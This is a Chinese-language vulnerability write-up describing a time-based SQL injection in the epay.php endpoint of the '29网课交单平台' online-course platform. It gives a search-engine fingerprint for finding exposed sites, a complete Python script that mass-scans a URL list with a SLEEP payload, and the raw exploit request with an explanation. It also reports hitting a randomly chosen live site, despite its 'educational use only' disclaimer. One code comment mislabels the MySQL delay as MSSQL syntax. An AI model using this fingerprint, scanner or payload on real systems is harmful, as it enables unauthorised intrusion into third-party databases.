声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。
一、漏洞描述
29网课交单平台是一个在线学习平台,用于帮助学生完成网络课程的学习任务。这个平台提供了包括登录、注册、用户界面、任务进度列表等多种功能,用户可以通过平台管理自己的学习进度,查看和提交作业等。但是这个于平台在 /epay/epay.php 接口处存在sql注入漏洞。
二、资产收集
1.使用网络空间测绘引擎搜索
鹰图检索:web.body="你在看什么呢?我写的代码好看吗"
2.使用poc批量扫描
import http.client # 导入http.client模块,用于发送HTTP请求
import ssl # 导入ssl模块,用于处理SSL证书验证
import argparse # 导入argparse模块,用于解析命令行参数
from urllib.parse import urlparse # 导入urlparse函数,用于解析URL
import time # 导入time模块,用于计算时间差# 定义控制台输出颜色代码
RED = '\033[91m' # 红色
RESET = '\033[0m' # 重置颜色def check_vulnerability(url):"""检查给定URL是否存在特定的SQL注入漏洞。"""try:# 解析URL,获取域名和协议parsed_url = urlparse(url)# 设置请求的路径和数据体path = "/epay/epay.php" # 要请求的路径# 构造POST请求的数据体,包含潜在的SQL注入payloadbody = "out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(3)))eEcA) AND 'aEmC'='aEmC"headers = {"Content-Type": "application/x-www-form-urlencoded", # 设置Content-Type头"User-Agent": "Mozilla/5.0" # 设置User-Agent头}# 根据URL的协议创建连接对象,如果是HTTPS则忽略证书验证conn = http.client.HTTPSConnection(parsed_url.netloc, context=ssl._create_unverified_context()) if parsed_url.scheme == "https" else http.client.HTTPConnection(parsed_url.netloc)# 记录开始时间start_time = time.time()# 发送POST请求conn.request("POST", path, body=body, headers=headers)# 获取服务器响应response = conn.getresponse()# 计算请求耗时elapsed_time = time.time() - start_time# 如果响应时间在3到5秒之间,可能表明存在SQL注入漏洞(因为waitfor delay '0:0:3'会延迟响应)if 3 <= elapsed_time <= 5:print(f"{RED}URL [{url}] 可能存在29网课交单平台 epay.php SQL注入漏洞{RESET}")else:print(f"URL [{url}] 不存在漏洞")except Exception as e:# 如果请求失败,打印错误信息print(f"URL [{url}] 请求失败: {e}")def main():"""主函数,解析命令行参数并调用漏洞检查函数。"""# 创建命令行参数解析器parser = argparse.ArgumentParser(description='检测目标地址是否存在29网课交单平台 epay.php SQL注入漏洞')# 添加命令行参数选项parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')# 解析命令行参数args = parser.parse_args()# 如果指定了单个URL,进行漏洞检查if args.url:# 确保URL格式正确if not args.url.startswith("http://") and not args.url.startswith("https://"):args.url = "http://" + args.urlcheck_vulnerability(args.url)# 如果指定了包含多个URL的文件,逐个读取并进行漏洞检查elif args.file:with open(args.file, 'r') as file:urls = file.read().splitlines() # 读取所有行并去除换行符for url in urls:# 确保URL格式正确if not url.startswith("http://") and not url.startswith("https://"):url = "http://" + urlcheck_vulnerability(url)# 当作为主程序运行时,调用main函数
if __name__ == '__main__':main()
cmd运行:python poc.py -f url.txt
随机寻找的幸运儿
三、漏洞复现
1.构造数据包
POST /epay/epay.php HTTP/1.1
Host:ip
Content-Type: application/x-www-form-urlencodedout_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC
2.数据包分析
-
POST: 这是一个HTTP方法,用于向服务器提交数据。
-
/epay/epay.php: 这是请求的URI,指定了服务器上处理这个请求的具体位置。
-
HTTP/1.1: 这是使用的HTTP协议版本。
-
Host: ip: 这里的
Host头部字段指定了接收请求的服务器的地址。 -
Content-Type: application/x-www-form-urlencoded: 这指示了请求体(body)的数据编码格式。
-
请求体(Request Body):out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC
out_trade_no=是参数名,正常情况下,它可能表示一个交易编号。'AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC是追加到参数值中的恶意内容,目的在于测试和利用SQL注入漏洞。SLEEP(5)是一个MySQL函数,它会暂停(sleep)执行5秒。如果这个请求导致服务器延迟响应5秒,那么攻击者可以确认SQL注入漏洞存在,因为这意味着他们输入的SQL代码已经被数据库执行。'aEmC'='aEmC是为了使SQL语句在逻辑上成立(永远为true),从而不干扰原查询的其他部分。
3.结束跑路
执行成功,延时1秒。
执行成功,延时4秒。
寄语:给时光以生命,给岁月以文明。